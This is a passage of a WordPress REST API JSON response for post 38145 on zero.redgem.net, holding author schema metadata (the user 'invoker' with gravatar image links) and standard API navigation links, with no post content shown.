redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38145"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38145\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38145"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38145"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}